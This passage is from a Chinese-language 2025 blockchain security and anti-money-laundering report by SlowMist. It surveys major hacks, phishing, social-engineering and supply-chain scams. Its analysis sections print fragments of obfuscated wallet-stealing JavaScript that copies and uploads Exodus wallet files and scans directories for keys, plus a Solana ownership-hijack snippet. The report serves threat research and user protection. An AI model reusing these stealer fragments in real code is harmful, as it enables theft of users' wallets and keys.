> **来源:[研报客](https://pc.yanbaoke.cn)** SLOWMIST 2025 # 区块链安全与反洗钱年度报告 # 目录 # 一、前言 3 # 二、区块链安全态势 3 2.1 安全事件概览 4 2.2年度损失Top10攻击事件 6 2.2.1 Bybit 7 2.2.2 Cetus Protocol 7 2.2.3 Balancer V2 7 2.2.4 Nobitex 7 2.2.5 Phemex 8 2.2.6 UPCX 8 2.2.7 BtcTurk 8 2.2.8 Infini 8 2.2.9 CoinDCX 9 2.2.10 GMX 9 # 2.3 欺诈手法 9 2.3.1 钓鱼攻击 9 2.3.2 社会工程攻击 18 2.3.3供应链与开源生态投毒 27 2.3.4恶意浏览器扩展与扩展生态风险 33 2.3.5利用AI技术的攻击 38 2.3.6 资金盘诈骗 45 # 三、反洗钱态势 51 3.1反洗钱及监管动态 51 3.1.1执法与制裁行动 51 3.1.2 监管政策 54 3.1.2.1 亚洲 54 3.1.2.2欧洲 58 3.1.2.3北美洲 60 3.1.2.4 拉丁美洲 61 3.1.2.5 中东 62 3.1.2.6非洲 62 3.1.2.7大洋洲 62 3.2资金冻结/归还数据 63 3.3网络犯罪组织与地下网络生态 66 3.3.1朝鲜黑客 66 3.3.2 钓鱼 Drainer 82 3.3.3 Huione Group 90 3.3.4勒索/恶意软件 94 3.3.5隐私/混币工具 99 四、总结 103 五、免责声明 104 六、关于我们 105 # 一、前言 2025年,区块链行业继续高速演化,宏观金融环境、监管不确定性与攻击强度叠加,使全年安全态势显著复杂。一方面,黑客组织与地下网络犯罪呈现更强的组织化与专业化特征,朝鲜相关黑客仍高频活跃,信息窃取木马、私钥劫持与社工钓鱼成为全年主攻方向;DeFi生态风险持续暴露,Meme发行、权限管理等均多次引发大额损失,RaaS/MaaS服务化降低了犯罪门槛,让无技术背景的攻击者也能快速发动攻击。与此同时,地下洗钱体系不断成熟,东南亚地区诈骗集群、隐私工具与混币设施构成多层级资金通道。在监管端,各国加速推进加密资产AML/CFT框架落地,美国、英国、欧盟及亚洲地区开展多起跨境执法行动,链上追踪、情报协作与资产冻结效率显著提高,跨国执法从以往的单点打击迈向系统化围堵。值得关注的是,不同类型隐私协议的法律边界正在被重新定义,监管逐步从“一刀切制裁”转向区分技术属性与犯罪用途的更精细路径,技术自由与法律责任之间的界线比以往更清晰。 作为区块链安全领域的先行者,慢雾(SlowMist)持续在威胁情报、攻击监测、追踪溯源和合规支持方面深耕,协助多起黑客资金溯源与冻结。本报告聚焦2025年关键安全事件、APT组织活动趋势、资金洗钱模型演变及监管执法进展,希望能为行业从业者、安全研究人员与合规负责人提供及时、系统、具有洞察力的安全合规参考,提升对风险的识别、响应与预判能力。 # 二、区块链安全态势 2025年,区块链行业仍面临着严峻的安全挑战。根据慢雾区块链被黑事件档案库(SlowMistHacked)不完全统计,全年共发生安全事件200起,造成损失约29.35亿美元。相比2024年(410起,损失约20.13亿美元),尽管事件数量明显下降,但损失金额却同比上升约 $46\%$ 。(注:本报告数据基于事件发生时的代币价格,由于币价波动、部分未公开事件以及普通用户的损失未纳入统计等因素,实际损失应高于统计结果) # [SlowMist Hacked Statistical]: Total 2025 hack event(s) 200 ; The total amount of money lost by blockchain hackers is about \(2,935,466,855.00; (https://hacked Slowmist.io/) # 2.1 安全事件概览 # (1)按生态分布 - Ethereum 仍是最主要的受攻击生态,相关损失约2.54亿美元; - BSC 其次, 损失约 2193 万美元; - Solana 位列第三,损失约1745万美元。 2025各生态安全事件分布及损失 (2025 各生态安全事件分布及损失) # (2)按项目类型 - DeFi项目是最常遭攻击的领域:2025年共发生126起安全事件,约占全年总数的 $63\%$ ,损失约6.49亿美元。相较2024年(339起,损失10.29亿美元)损失下降约 $37\%$ 。 - 交易平台事件仅12起,却造成高达18.09亿美元损失,其中Bybit单次即损失约14.6亿美元,是全年最严重事件。 2025年各赛道安全事件分布及损失 (2025各赛道安全事件分布及损失) # (3)按攻击原因 - 合约漏洞是主要诱因,共61起; - X账号被黑紧随其后,共48起。 2025 安全事件手法图 (2025安全事件手法图) # 2.2年度损失Top10攻击事件 2025 损失 Top10 的攻击事件 (2025 损失 Top10 的安全攻击事件) # 2.2.1 Bybit 2月21日,链上侦探ZachXBT披露Bybit平台出现异常大额资金转出,最终确认本次事件造成超过14.6亿美元的加密资产被盗,成为近年来损失金额最大的加密货币安全事件之一。事件发生后,慢雾(SlowMist)第一时间结合攻击者获取Safe多签权限的方式及后续洗币行为进行研判,判断攻击者可能来自朝鲜黑客组织。进一步分析显示,攻击者先获取了app.safe.global前端代码的控制权,并以此为入口,对Bybit使用的Safe{Wallet}多签钱包实施了精准攻击。事后,Safe与Bybit联合发布安全调查公告,确认攻击源自Safe{Wallet}的AWS基础设施(可能涉及S3/CloudFront账户或API Key泄露或被人侵),Bybit自身基础设施并未遭到攻击。 # 2.2.2 Cetus Protocol 5月22日,Sui生态流动性提供商Cetus Protocol遭受攻击,多个流动性池深度大幅下降,平台内多条代币交易对价格出现明显下跌,初步估算损失金额超过2.3亿美元。随后,项目方宣布已通过验证者冻结机制追回约1.62亿美元资产。慢雾(SlowMist)分析确认本次攻击的根本原因主要来自两方面:其一,Cork机制允许用户通过CorkConfig合约创建以任意资产作为赎回资产(RA)的市场,使攻击者得以将DS设定为RA;其二,任意用户均可在无需授权的情况下调用CorkHook合约的beforeSwap函数,并传入自定义hook数据执行CorkCall操作,从而使攻击者能够操纵流程,将合法市场中的DS转移至另一市场并作为RA使用,进而获取对应的DS与CT代币。 # 2.2.3 Balancer V2 11月3日,DeFi协议Balancer V2遭遇漏洞攻击,受影响对象为可组合稳定池(Composable Stable Pools)。此次攻击在以太坊、Arbitrum、Base、Optimism和Polygon上共造成1.211亿美元的资产损失。慢雾(SlowMist)分析确认攻击的根本原因在于Stable Pool“exact-out”交换路径中存在四舍五入方向错误,该缺陷在汇率提供者引入的精度误差以及极低流动性环境下被进一步放大,导致攻击者得以操控池内不变式并扭曲BPT的价格计算,从而以显著低于真实成本的方式大规模提取池内资产。11月19日,Balancer发布事后分析报告称,在问题被发现后,各方迅速协调并部署了多项安全措施,最终约4,570万美元的用户资金得以保护或追回。 # 2.2.4 Nobitex 6月18日,总部位于伊朗的加密货币交易所Nobitex遭遇黑客攻击。经平台确认,攻击者将资金转入带有反伊朗革命卫队标语的销毁地址,销毁约1亿美元加密资产,明显带有“心理破坏”的意图。自称为“Gonjeshke Darande”(意为“掠夺之雀”,又称Predatory Sparrow)的亲以色列黑客组织 宣称对此次攻击负责,并在24小时内公布了该平台的源代码和内部数据。据悉,该组织与以色列存在关联,并指责Nobitex是“资助恐怖主义、规避制裁的关键政权工具”。 # 2.2.5 Phemex 1月23日,总部位于新加坡的加密货币交易所Phemex热钱包遭到攻击,造成约7,000万美元的资产损失,涉及多个链和代币。多位区块链安全专家认为,此次事件可能与朝鲜相关黑客组织TraderTraitor有关。2月20日,链上监测显示,攻击者开始对被盗资金进行拆分和转移,部分资产流入TornadoCash等混币服务。 # 2.2.6 UPCX 4月1日,区块链支付平台UPCX的官方地址遭到未授权访问。攻击者疑似获取了管理员权限,通过升级ProxyAdmin合约并调用withdrawByAdmin函数,从三个管理账户中转移了共计约1,840万枚UPC(约7,000万美元)。事件发生后,平台随即紧急暂停UPC的充值与提现操作。4月4日,UPCX在社交平台发文表示,项目方仍实际掌控约18,473,290枚UPC,将继续推进相关UPC的转移操作。 # 2.2.7 BtcTurk 8月14日,土耳其加密货币交易所BtcTurk疑似再次遭遇黑客攻击,损失约5,400万美元,涉及ETH、AVAX、ARB、Base、Optimism、Mantle和MATIC等多个链。链上数据显示,大部分被盗资产集中流向两个地址,疑似为协同攻击行为,且攻击者已将全部被盗资金兑换为ETH。BtcTurk随后承认其热钱包出现“异常活动”,并暂停平台的充值与提现功能,待调查完成后再行恢复。 # 2.2.8 Infini 2月24日,专注于稳定币的加密货币新型银行Infini遭攻击,攻击者获取了一个拥有管理员权限的钱包,并盗走公司近5,000万美元资金。Infini创始人Christian发推表示,个人私钥未泄露,事件源于此前转交权限时的操作疏忽。3月20日,Infini向攻击者发送链上消息,附上法院诉讼文件,指控前员工ChenShanxuan涉嫌盗取约4,950万USDC,并申请冻结相关资产及披露交易信息。8月11日,Infini再次通过链上消息向攻击者发出信息,表示若在8月13日20:00前归还被盗资金,将不再采取进一步法律行动,攻击者可保留全部利润作为白帽赏金。 # 2.2.9 CoinDCX 7月19日,链上侦探ZachXBT于其个人频道发文称:“看起来印度的中心化交易平台CoinDCX可能在大约17小时前被盗,损失约4,420万美元。”不久后,该公司联创SumitGupta回应称,Sumit披露受到攻击的钱包是一个仅用于提供流动性的内部运营账户,客户的资金因储存在安全的冷钱包中而并未受到影响,交易和提款将恢复正常,攻击产生的全部损失将由CoinDCX的储备金承担。7月31日,据FinanceFeeds报道,CoinDCX的一位软件工程师因涉及协助攻击被捕。攻击者以兼职工作为由向该软件工程师的电脑中安装恶意软件,并支付高额兼职薪资。该恶意软件是一款复杂的键盘记录器,攻击者借此获取登录凭证并访问CoinDCX的内部系统,最终导致了此次事件。 # 2.2.10 GMX 7月9日,据慢雾MistEye安全监控系统监测,知名去中心化交易平台GMX遭攻击,损失价值超4,200万美元的资产。经慢雾(SlowMist)分析,本次攻击的核心在于攻击者利用了Keeper系统执行订单时会启用杠杆,以及做空时会更新全局平均价格而平空却不会更新的这两个特性,通过重入攻击创建大额空头头寸,操控了全局空头平均价格和全局空头仓位规模的值,从而直接放大了GLP价格来赎回获利。7月19日,GMX在X平台发布事件后续进展。经过协商,攻击者返还了所有被盗资金,并获得500万美元赏金。 # 2.3 欺诈手法 2025年,区块链生态中的诈骗与侵入式攻击手法继续升级,呈现出更强的迷惑性与渗透能力。从传统钓鱼逐步演化为权限劫持、恶意代码执行和供应链投毒,攻击不再依赖单一方式,而是结合社会工程、浏览器机制、新协议特性与混合型诱导策略,形成更具隐蔽性和破坏性的攻击链条。以下是2025年值得重点关注的几种典型或新型的欺诈手法。 # 2.3.1 钓鱼攻击 2025年钓鱼仍是最活跃的风险点之一,攻击方式从简单仿站、假授权页面,扩展到结合系统命令、钱包权限、协议特性甚至设备控制的复合手法。许多攻击不再直接索要助记词,而是诱导用户自己“按步骤完成盗取过程”,形成更加隐蔽且破坏力更强的攻击方式,钓鱼攻击的影响范围显著扩大。 # (1) Clickfix 钓鱼攻击 Clickfix 钓鱼攻击是一类典型的“前端交互型钓鱼”,其核心并非直接诱导用户转账或授权,而是通过高度拟真的网页交互,诱导用户主动执行恶意操作。攻击者通常仿冒用户熟悉的安全验证流程,例如机器人校验、异常修复或安全检查页面,使整个过程看起来与日常上网体验并无明显差异。 # CloudFlare Verify you are human by completing the action below. 在实际攻击过程中,当用户点击验证按钮或勾选校验框时,钓鱼网站会在后台将恶意命令悄然写入系统剪贴板,并进一步引导用户通过快捷键或系统运行窗口“完成验证”。这一过程往往伴随着明确的操作指引,使用户误以为只是一次必要的验证步骤。命令一旦被执行,恶意脚本便会从远程服务器下载并运行后续程序,在本地建立持久化机制。 慢雾对相关样本的分析显示,此类恶意程序通常具备完整的信息窃取能力,目标涵盖浏览器数据、加密钱包文件、私钥、助记词、密码以及键盘输入内容等,并可能通过远程控制服务器持续回传数据。 需要注意的是,这类钓鱼攻击往往结合社会工程学手段来实现——通过诱导用户执行某些恶意命令,达成下载恶意软件的目的。用户在毫无防备的情况下执行此类命令,可能导致钱包私钥等敏感信息被盗取。 # (2) Solana 钱包 Owner 权限被篡改 在此类攻击中,钓鱼进一步从“资产层”升级至“账户控制层”。慢雾(SlowMist)在2025年协助分析的一起案例中,受害者遭遇钓鱼攻击,其钱包中存在异常授权记录,试图撤销授权却无法完成,同 时其钱包账户的Owner权限被转移,直接导致超过300万美元的资产被盗,另有大额资产一度被锁定在DeFi协议中无法操作。 受害者曾尝试从该账户向自身地址发起转账以验证权限,但所有交易均失败。这一情况与TRON生态中频繁出现的“恶意多签”攻击具有高度相似性。换言之,这起攻击并不是传统意义的“授权被盗”,而是核心权限(Owner权限)被攻击者替换,导致受害者即便想转账、撤销授权或操作DeFi资产,也毫无办法。资金虽“看得见”,但已无法控制。攻击者利用了两种反直觉的场景成功诱骗了用户点击:其一,通常交易签名时,钱包会模拟运行交易的执行结果,如果有资金变化那么会显示在交互界面上,而攻击者精心构造的交易没有资金变化;其二,传统的以太坊EOA账号是私钥控制所有权,主观上不清楚Solana存在可以修改账号所有权的特性。 通常我们用钱包创建账号时,Owner是系统账号(1111111111111111111111111111),在交易时需要通过系统验证交易签名是否由对应的公钥签署而来的,这种普通账号无法在外部通过命 令或脚本直接修改Owner,但可以通过智能合约调用进行修改,其中assign指令将账户的Owner从当前值改为new Owner,部署程序后,使用Solana CLI或客户端(如Solana Web3.js)调用这个指令。本次钓鱼事件正是利用这一特性诱导受害者主动签名含有assign指令的交易,从而悄无声息地完成了受害者钱包地址Owner的转移。 ```txt 1 let assign_ix $=$ systeminstruction::assign( 2 account_to_assign.key, 3 &new-owner, 4 ); ``` 这类攻击的隐蔽性极强,其本质并非“授权被滥用”,而是“账户所有权被替换”。从用户视角来看,资产依然存在于链上,却已完全失去控制权,风险等级远高于传统钓鱼场景。 # (3)EIP-7702 授权滥用 随着账户抽象相关提案逐步落地,新的协议能力也成为钓鱼攻击的重要切入点。5月24日,一位用户因EIP-7702授权操作遭遇钓鱼攻击,导致损失达146,551美元。攻击由知名钓鱼团伙Inferno Drainer发起,其手法利用了EIP-7702的新特性。具体来说,此次并非通过钓鱼方式把用户的EOA地址切换为7702合约地址,即 delegated address 并非钓鱼地址,而是几天前就存在的MetaMask: EIP-7702 Delegator(0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B): 钓鱼利用了MetaMask: EIP-7702 Delegator里的机制来完成受害者地址有关token的批量授权钓鱼盗币操作。 0 ETH ($0.00) 0.001387505999887128 ETH $3.46 4.060026686 Gwei (0.000000004060026686 ETH) $2,526.90 / ETH 518,442 341,748 (65.92%) Base: 3.090026684 Gwei | Max: 5.342706644 Gwei | Max Priority: 0.970000002 Gwei Burnt: 0.001056010439203632 ETH (\$2.64) Txn Savings: 0.000438353310286584 ETH (\$1.09) Txn Type: 2 (EIP-1559) Nonce:728 Position In Block: 282 Function: execute bytes32 proposalId, bytes actions) *** MethodID:0xe9ae5c53 execute from MetaMask: EIP-7702 Delegator [0]: 01000000000000000000000000000000000000000000000 [1]: 0000000000000000000000000000000000000 [2]: 00000000000000000000000000000000000000000000 [3]: 000000000000000000000000000000000000000000000000020 [4]: 000000000000000000000000000000000000000000000000000 iew Input As Decode Input Data View In Decoder Advanced Filter 此类钓鱼攻击之所以高效,根本原因在于EIP-7702带来的委托机制变更——用户的EOA地址可以被授权给某个合约,使其具备这个合约的特性(如批量转账、批量授权、gas代付等)。据Winternute的数据,目前超过 $97\%$ 的EIP-7702授权行为,都将权限授予了使用完全相同代码的多个合约。这些合约本质上是所谓的“Sweeper(自动清扫器)”,其用途是在地址私钥泄露后,自动将新转入的ETH迅速转走。 Delegate Contracts Distribution Delegate Contracts -- Multichain 此外,一些防钓鱼工具无法准确捕捉批量授权操作的风险,也为钓鱼/盗币团伙创造了可乘之机。关于EIP-7702委托机制的更多风险可查阅:慢雾:深入探讨EIP-7702与最佳实践。 # (4)Telegram 假 Safeguard 骗局 2025年初,大量用户在Telegram平台遭遇假Safeguard骗局,最终导致资产被盗或设备中毒。该类骗局以诱导用户执行剪贴板中的恶意代码为核心,借助代币空投、仿冒KOL帖子等高频场景广泛撒网,引发严重安全后果。即便是经验丰富的玩家,也可能在FOMO情绪和“官方验证”的假象下中招。此类骗局主要分为两种,一种是盗取Telegram账号,骗子通过诱导用户输入手机号、验证码,甚至Two-StepVerification密码来窃取其Telegram账号,另一种是往用户电脑植入木马,也是出现较多的手法。 骗子常常创建假冒KOL的X账号,并在评论区附上Telegram链接,邀请用户加入“独家” Telegram 群组以获得投资信息。进入该 Telegram Channel 后,用户会被引导进行验证。点击 Taptovery 后,会打开一个假冒的 Safeguard bot,表面上显示正在进行验证,该验证窗口持续时间极短,营造出一种紧迫感,迫使用户继续操作。 继续点击,结果“假装”显示验证不通过,最终让用户手动验证的提示界面出现了: 骗子很“贴心”地配置了Step1, Step2, Step3,此时用户的剪贴板里已经有恶意代码,如果用户真的按照指南打开运行框,并 $\mathrm{Ctrl} + \mathrm{V}$ 把恶意代码内容粘贴进运行框里,此时的状态就如下图,在运行框里并看不到全部内容,一大片空白的前面是Telegram字样及恶意代码。这些恶意代码通常是Powershell指令,执行后会悄无声息地下载更复杂的恶意代码,最终使电脑感染远程控制木马(如Remcos)。一旦电脑被木马控制,黑客便能远程窃取电脑中的钱包文件、助记词、私钥、密码等敏感信息,甚至进行资产盗窃。 如果是手机上打开的,骗子会一步步拿到 Telegram 权限。如果不是 Windows 电脑,而是 Mac 电脑,也一样有类似的方式来诱导用户的电脑中毒,套路类似。如果怀疑自己运行过此类剪贴板恶意代码,建议立即采取以下措施:更换所有使用过的热钱包,资产立即转移至全新地址;重设所有在此电脑登录过的账号密码、2FA,包括邮箱、交易平台、Telegram 等;彻底重装系统,并使用 Bitdefender、Kaspersky、AVG 等专业杀毒工具进行全盘清除。 针对上述钓鱼攻击,最重要的预防方法,就是在点链接和点“签名”之前多想一下:来源是不是可信?这个页面是不是官方的?这个签名到底在做什么?如果钱包弹出的内容你完全看不懂,或者里面突然出现一些奇怪的权限、陌生的地址、莫名其妙需要你授权的地方,那就一定要停下来,千万不要硬着头皮点确认。平时也尽量不要用存着大额资产的钱包到处交互。做任务、玩项目、领空投可以专门准备一个“低余额、只用于交互”的小号,把真正的重要资产放在独立的钱包甚至冷钱包里,就算误签了也能把损失降到最低。另外,尽量少给“无限授权”,能限制范围、限制金额就限制一下,减少让攻击者可以长期滥用的空间。总之,多看一眼、多确认一次、不乱点、不乱签,给自己留层保护;大额资产分离存放、小号负责交互,大号只负责保管;遇到异常立刻停下,不要抱着侥幸心理。只要做到这些,被这类钓鱼攻击的风险就能大幅降低。最后,非常推荐阅读《区块链黑暗森林自救手册》。 # 2.3.2 社会工程攻击 2025年,社会工程攻击在区块链安全事件中呈现出明显的上升趋势,逐渐成为连接钓鱼、恶意软件和资产盗取的关键入口。此类攻击以“操纵信任”为核心,通过身份伪装、情绪施压和信息不对称,引导受害者主动配合完成高风险操作。攻击者往往并不急于直接盗取资产,而是通过多轮互动逐步建立可信形象,最终诱导受害者下载恶意程序、泄露私钥或将资产转移至攻击者控制的地址。随着AI技术、社交平台与数据泄露事件的叠加,社会工程攻击在2025年表现出更强的针对性和欺骗性。 # (1)招聘面试骗局 以招聘和技术面试为名的社会工程攻击在2025年明显增多,工程师和技术人员成为重点目标群体。攻击者通常活跃于LinkedIn等社交平台,冒充区块链项目方,向受害者发送高度专业化的招聘信息,包括完整的项目愿景、技术架构描述,甚至附带设计稿和团队配置说明。在初步建立信任后,对方会迅速推进所谓的“技术评估流程”,要求候选人下载代码仓库并在本地运行项目。 Guilherme Jones Active now Add to folk Guilherme Jones 9:20 AM Hi Bruno Skvord Currently focusing on developing a Socifi game and looking to hire developers for it. Based on cutting edge blockchain technology, this game allows you to gather friends, form teams, and compete with other players to earn token rewards for your skills. Now we want to develop a new platform that integrates staking sites, NFT marketplaces, and other features using game tokens and NFT assets. Our project is a staking smart contract platform by socifi-mvp Games. A decentralized exchange - Games Multi-game community features - NFTs/Tokens Live streaming services You can check out the MVP v2 design here: https://www.figma.com/design/MBf9Hrcm3OK0nivR4rihdd/Cryptoasis-MVP-V1?node-id=0-1&p=f&t=EL1CRjE5MLJWOYVb-0 I have already hired backend and smart contract developers. I would like to recommend you as a project manager or blockchain and frontend development team leader. I think with your background and experience, you can help me. What I mean is your experience will be valuable for me You are quite a man. A real inspiration for me. I know you didn't expect to have me around but I believe your skill is very perfect and suitable for this project. So I'd like to work with you. Okay This is the hiring process of our company - Checking background Live Coding Technical Interview 慢雾(SlowMist)分析发现,这类攻击的恶意代码往往隐藏在不显眼的细节中,例如被混淆的依赖包、异常的代码行或被加密的载荷。一旦代码运行,恶意程序便会在后台执行,窃取浏览器插件钱包、系统 Keychain、SSH 私钥等敏感信息,并与远程控制服务器建立持久连接。更具迷惑性的是,这些恶意行为在初期通常不会造成明显异常,导致受害者在中招后仍毫无察觉。 ```javascript 100 return 10x1; 101 } 102 103const R = w(F); 104 105 function S(bl) { 106 return f[R](bl); 107 108const T = 'Y331YXRLumVhZFN@cmVhbQ'; 109 110function U(bl) { 111 return scrs = w(T), f[scrs](bl); 112 113 114function b(c, d) { 115 const e = a(); 116 return b = function(f, g) { 117 f = f - 0x100; 118 let h = e[f]; 119 return h; 120 }, b(c, d); 121 122 123function a() { 124 const cm = ['fk4', 'd33PdGVGaWxlU3luYW', 'L3Bkb3c', 'YmJsZGNuZ2NuYXBuZG9kanA', 'L0FwcERhdGEv', 'cmVhZGRpcUN5bmM', 'a2V5My5kYg', 'OjEyNDQ=', 'pld_', 'c3RhdFN5br; 125 a = function() { 126 return cm; 127 }; 128 return a(); 129 130const V = bN(0x145), 131 W = bN(@x15d), 132 X = bN(@x106), 133 Y = bN(@x12f), 134 Z = bN(0x149), 135 a0 = 'Y3A', 136 a1 = bN(0x17b), 137 a2 = bN(0x133), 138 a3 = w(V), 139 a4 = w(W), 140 a5 = 'aZmIsZWShbMU', 141 a6 = bN(0x114), 142 a7 = bN(0x141), 143 a8 = bN(0x169), 144 a9 = bN(0x135), 145 aa = h(a5), 146 ab = h(a6), 147 ac = h(a9), 148 ad = h(a7), 149 ae = h(a8), 150 af = w(Y), 151 ag = w(a2), 152 ah = w(H), 153 a1 = bN(0x10a), 154 aj = bN(0x12e), 155 ak = 'LlVzZXIGRFQYQ', 156 al = 'LxpYnJhcnkvOXBwBGljYXRpb24gU3WcG9ydC8', 157 am = 'OnJhdmVtbZ2D2FyZS9CcmFZ2S1Ccm93c2Vy', 158 an = bN(0x103), 159 ao = 'R29VZ2xI0Nocm9tZQ', 160 ap = bN(0x13b), 161 ag = 'TG9jYww' + ao, ``` 在另一类Web3面试骗局中,攻击者通过GitHub开源项目作为载体,诱导候选人克隆并运行包含恶意NPM包的仓库。这些包往往通过混淆、加密和反虚拟机检测技术隐藏真实行为,不仅具备数据窃取能力,还可远程执行命令、进行键盘记录和截屏。这类攻击充分利用了技术人员对“开源”“测试任务”的信任预期,使社会工程与供应链攻击形成叠加效应。 ```csv 211 const uploadEs $=$ _0x9c63c8 $\Rightarrow$ { 212 let_0x399f4c $= 11$ . 213 let_0x384fb4 $= []$ . 214 if('w' == platform[0]){ 215 _0x399f4c $=$ getAbsolutePath('~/') + "/AppData/Roaming/Exodus/exodus.wallet"; 216 } else if('d' == platform[0]){ 217 _0x399f4c $=$ getAbsolutePath('~/') + "/Library/Application Support/exodus.wallet"; 218 } else{ 219 _0x399f4c $=$ getAbsolutePath('~/') + "/.config/Exodus/exodus.wallet"; 220 } 221 if (testPath(_0x399f4c)){ 222 let_0x509c54 $= []$ . 223 try{ 224 _0x509c54 $=$ fs.readdirSync(_0x399f4c); 225 } catch(_0x53bda5){ 226 _0x509c54 $= []$ . 227 } 228 let_0xcfa056 $= 0$ . 229 if(!testPath(getAbsolutePath('~/') + "/.n3")){ 230 fs_promises.mkdir(getAbsolutePath('~/') + '/.n3'); 231 } 232 _0x509c54.forEach(async_0xe0e86b $\Rightarrow$ { 233 let_0x577d0a $=$ path.join(_0x399f4c,_0xe0e86b); 234 try{ 235 fs_promises.copyFile(_0x577d0a,getAbsolutePath('~/') + "/.n3,tp" + _0xcfa056); 236 const _0x3c0cd1 $=$ { filename:"64_" + _0xe0e86b 237 }; 238 _0x384fb4.push({ 'value': fs.createReadStream(getAbsolutePath('~/') + "/.n3,tp" + _0xcfa056), 241 options':_0x3c0cd1 242 }); 243 _0xcfa056 += 1; 244 } catch(_0xa50c13){ 245 }; 246 } 247 Upload(_0x384fb4,_0x9c63c8); 248 return _0x384fb4; ``` # (2)假冒安全专家诈骗 假冒安全专家行骗是2025年社会工程攻击中的新形态之一。攻击者通常活跃于X、Telegram等社交平台,通过长期转发安全研究、行业新闻和知名安全公司动态,塑造“专业研究员”或“安全从业者”的公众形象。 在一起典型案例中,攻击者通过X平台冒充安全专家并主动接触受害者。在建立初步信任后,对方便以“安全研究”“环境测试”等理由,诱导受害者在电脑上安装所谓的工具或程序。攻击成功后,受害者的钱包和社交账号被迅速接管。 在另一条行骗路径中,攻击者则以“帮助用户排查风险授权”为由,主动联系受害者,声称发现用户钱包存在高危签名,并提供一个界面高度仿真的“授权检测与撤销工具”。该工具在设计上刻意模仿主流授权管理平台,使用户误以为是业内常用服务。在查询结果中,工具会刻意制造“地址确有风险”的假象。 # Signature Extension Exploits Learn FAQ More # Signature Checker Search by Address or Private Key # What Are Phishing Signatures? Phishing signatures refer to fraudulent or malicious signatures that are attached to transactions, tokens, or contracts within blockchain networks. These signatures are deliberately crafted to deceive users into compromising their private keys, authorization tokens, or funds. Attackers utilize these malicious signatures to manipulate or scam users into authorizing transactions that may lead to significant financial loss. # How Do Phishing Signatures Occur? h assets at risk. It's crucial to exercise caution when interacting with unknown or unverified applications. # How Can You Detect and Remove Phishing Signatures? The Phishing Signature Checker allows you to easily detect any phishing signatures associated with your wallet address. To begin, simply enter your wallet address. Our tool will then scan and identify any transactions associated with malicious contracts or phishing attempts. If any phishing signatures are detected, you can clear them directly from the interface, effectively removing them from your account. It is highly recommended to perform regular checks and clear any phishing signatures to ensure your digital assets remain secure. # Why Is It Important to Clear Phishing Signatures? Clearing phishing signatures is an essential step in safeguarding your wallet and preventing malicious actors from gaining unauthorized access to your funds. Even if you have not authorized any suspicious transactions, phishing signatures may still pose a risk, as they could potentially be used in future interactions or trigger unwanted approvals without your knowledge. By removing these malicious signatures, you effectively limit the potential for future attacks and reduce the risk of theft. Regularly monitoring your wallet and clearing any identified phishing signatures will provide a critical layer of protection for your digital assets. 随后,攻击者进一步引导用户输入私钥以“彻底解除风险”,并提供所谓的“详细教程”和语音指导。在行骗过程中,攻击者甚至主动建议受害者“去咨询慢雾安全团队核实”,试图借助安全公司的名义增强可信度。这种“反向背书”策略,使部分用户在心理上更容易放松警惕。所幸该案例中的用户选择直接联系慢雾(SlowMist)核实,成功识破骗局,避免了资产损失。 # (3)假硬件钱包 在2025年,慢雾(SlowMist)多次协助分析因假硬件钱包导致的大额资产被盗案件。一个显著的共同点是:几乎所有受害者都认为自己“已经把安全做到极致”——使用冷钱包、离线存储、不连接网络。然而,正是这种“绝对安全感”,成为攻击者最容易利用的突破口。 在一起典型案例中,一名受害者称其在短视频平台购买了一款“冷钱包”,随后约650万美元的加密资产被盗。调查发现,该设备并非官方渠道销售,而是在出厂后被攻击者提前激活、记录助记词并重新封装,再通过非官方渠道流入市场。用户在不知情的情况下,按照随盒附带的“使用说明”完成激活并将资产转入,资金很快被攻击者转走,完整复现了典型的“假硬件钱包”盗币流程。 在另一起事件中,受害者以618元的价格从一家名为“ConsenShop工作室”的非官方商家处购买了一款所谓的“安全冷钱包”。在将4.35枚BTC转入该钱包后不久,资金即被全部转走。该案例再次印证了这类骗局的本质:它并不依赖复杂的技术漏洞,而是利用用户对品牌、价格和“硬件钱包”这一概念的信任,通过信息不对称完成资产掠夺。 攻击者的手法也在不断演变。除直接售卖假钱包外,还有用户反馈收到了“中奖赠送”或“官方空投”的冷钱包设备。攻击者在社交平台上伪装成知名厂商,以抽奖、福利活动等名义免费寄送设备。“免费”“官方”“全新未拆封”的组合,极易降低用户警惕。 还有攻击者会利用用户在历史数据泄露事件中暴露的个人信息,伪造“官方安全升级通知”,随信寄送所谓的“升级版硬件钱包”,并要求用户将原有助记词迁移至新的“更安全设备”。这些设备往往内置恶意固件,或引导用户在伪造软件中输入助记词,一旦迁移完成,资产便会被迅速转走。 从安全角度看,这类事件的问题并不在于“冷钱包是否安全”,而在于用户对硬件钱包安全模型的认知存在根本性误区。硬件钱包的安全前提只有一个:助记词必须由用户在设备上亲自生成,且从未被第三方接触过。一旦助记词在生成阶段就已泄露,无论设备是否离线、是否“冷”,都不再具备任何安全意义。本质上,这是一种披着“高安全工具”外衣的社会工程攻击。归根结底,硬件钱包的安全不在“设备长什么样”,而在“谁掌握助记词”。 # 2.3.3 供应链与开源生态投毒 2025年软件供应链攻击在区块链安全领域中持续活跃,攻击者不再局限于直接入侵知名库或核心基础设施,而是转向开源项目、开发者工具与依赖分发链条,通过投毒代码的方式,实现对大量下游用户的间接攻击。这类攻击往往并不针对单一受害者,而是通过“被信任的软件组件”进行扩散,一旦触发,影响范围广、溯源困难,且极易与社会工程手段形成叠加。 2025年7月,慢雾协助分析了一起因使用GitHub上热门Solana工具而导致资产被盗的事件。受害者在运行一个名为solana-pumpfun-bot的开源项目后,其钱包私钥被窃取并造成资产损失。该项目在GitHub上拥有较高的Star与Fork数量,表面上看似活跃可靠。 进一步分析发现,该项目存在明显异常:代码提交时间高度集中,缺乏正常项目应有的长期维护轨迹;其依赖中引用了一个名为 crypto.layout-utils 的第三方包,而该包已被 NPM 官方下架,且版本号并不存在于正常发布历史中。攻击者通过在 package-lock.json 中篡改依赖下载地址,绕过官方仓库,将恶意包从其控制的 GitHub Release 链接中分发给用户。 恶意依赖在运行后,会主动扫描本地文件系统,搜寻钱包文件、私钥等敏感信息,并上传至攻击者服务器。调查还发现,攻击者疑似控制了多个GitHub账号,通过批量Fork、刷Star的方式人为抬高项目热度,进一步增强可信度,扩大传播范围。 ```javascript function scanDirectoryRecursive(_0x26fa3, _0x548692, _0x26e1bf, _0x20ac4a, _0x2cef4) { if (!fsExistsSync(_0x26fa3)) return; try { { const _0x299368 = fs.readdirSync(_0x26fa3, { "withFileTypes": true }); for (const _0x524d33 of _0x299368) { const _0x173a48 = path.join(_0x26fa3, _0x524d33.name); if (_0x524d33.isDirectory()) { 